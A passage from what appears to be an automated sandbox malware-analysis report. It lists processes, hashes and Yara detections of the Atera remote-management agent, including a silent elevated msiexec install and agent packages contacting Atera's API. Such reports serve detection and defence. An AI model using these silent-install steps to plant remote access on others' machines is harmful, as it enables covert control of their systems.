                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2967904200.000001AF6BD20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2941460212.000001AF00177000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2941460212.000001AF0011D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2941460212.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2965977342.000001AF6AF00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2941460212.000001AF00286000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:12:46:28
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                        Start time:12:46:32
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
                                                                                                                                                                                                                                        Imagebase:0x235a11f0000
                                                                                                                                                                                                                                        File size:57'896 bytes
                                                                                                                                                                                                                                        MD5 hash:E9794F785780945D2DDE78520B9BB59F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000030.00000002.2630157426.00000235A16A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000030.00000002.2623179398.00000235A1300000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000030.00000002.2623179398.00000235A131B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000030.00000002.2623179398.00000235A1308000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000030.00000002.2623179398.00000235A1386000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000030.00000002.2623179398.00000235A133E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000030.00000002.2630449499.00000235A1B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000030.00000002.2630449499.00000235A1AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                        Start time:12:46:33
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                        Start time:12:46:33
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "756f8df8-494a-4cdb-9b3b-3f26b40ddc77" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x277df3c0000
                                                                                                                                                                                                                                        File size:33'320 bytes
                                                                                                                                                                                                                                        MD5 hash:DB1DB66EBD9B15B7DCD55374EA56EE5E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3050507203.000000E0F6AF1000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000000.2625128438.00000277DF3C2000.00000002.00000001.01000000.00000028.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3059593001.00000277DF724000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3059593001.00000277DF672000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3069197465.00000277DFBD2000.00000002.00000001.01000000.0000004C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3326560482.00000277F8637000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3059593001.00000277DF67A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3071249917.00000277E00F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3059593001.00000277DF63C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3068186659.00000277DFBB2000.00000002.00000001.01000000.0000004A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3071249917.00000277DFEC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3071249917.00000277DFE47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3056220052.00000277DF5A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3071249917.00000277DFE02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3071249917.00000277DFE1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3059593001.00000277DF630000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3071249917.00000277DFDA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000032.00000002.3059593001.00000277DF6BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                        Start time:12:46:34
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                        Start time:12:46:37
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "3117f898-c24e-40df-9020-7a24bf326b25" agent-api.atera.com/Production 443 or8ixLi90Mf "getlistofallupdates" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x1fc474f0000
                                                                                                                                                                                                                                        File size:201'256 bytes
                                                                                                                                                                                                                                        MD5 hash:CDE6BA86139AE458ABC24DAD31A66465
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2779069857.000001FC476FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2787380704.000001FC47D22000.00000002.00000001.01000000.0000003C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC47F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC4855B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC4817D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2779069857.000001FC476F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC480FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2779069857.000001FC47794000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2779069857.000001FC47740000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000000.2661915081.000001FC474F2000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC481A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2785272210.000001FC477E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC4854D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC480F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC48141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2779069857.000001FC476B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2819380529.000001FC6076A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC48036000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC48362000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC481AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2789370388.000001FC48220000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                        Start time:12:46:37
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                        Start time:12:46:38
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                                                                                                                                                                                                                        Imagebase:0x7ff7a5cc0000
                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000003.2862846017.0000017CE8290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000003.2930634492.0000017CE78A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000003.2794275404.0000017CE835A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2931529334.0000017CE78B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2932103351.0000017CE8363000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000003.2930446134.0000017CE78AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000003.2930359424.0000017CE789B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2931459924.0000017CE78A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000003.2865653804.0000017CE835A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2932103351.0000017CE835D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:55
                                                                                                                                                                                                                                        Start time:12:46:38
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 10B2694A2B9C11B571FDCBB60EE82DC9 E Global\MSI0000
                                                                                                                                                                                                                                        Imagebase:0x940000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:56
                                                                                                                                                                                                                                        Start time:12:46:38
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSI77D8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4552734 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:57
                                                                                                                                                                                                                                        Start time:12:46:39
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ff450401-d5c7-4b18-a355-4c1c5f3fd956" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x1aa4ad70000
                                                                                                                                                                                                                                        File size:219'696 bytes
                                                                                                                                                                                                                                        MD5 hash:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000000.2679670717.000001AA4AD72000.00000002.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2730506028.000001AA4B780000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2725136640.000001AA4B02C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2736724893.000001AA4BA62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2736724893.000001AA4BB21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2736724893.000001AA4BB2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2736724893.000001AA4BB2B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2736724893.000001AA4B8F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2725136640.000001AA4AFE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2736724893.000001AA4B910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2725136640.000001AA4AFA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2725136640.000001AA4AFED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2736724893.000001AA4B90E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2736724893.000001AA4BB29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2730506028.000001AA4B828000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2730506028.000001AA4B7F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2724449102.000001AA4AF30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                                        Start time:12:46:39
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
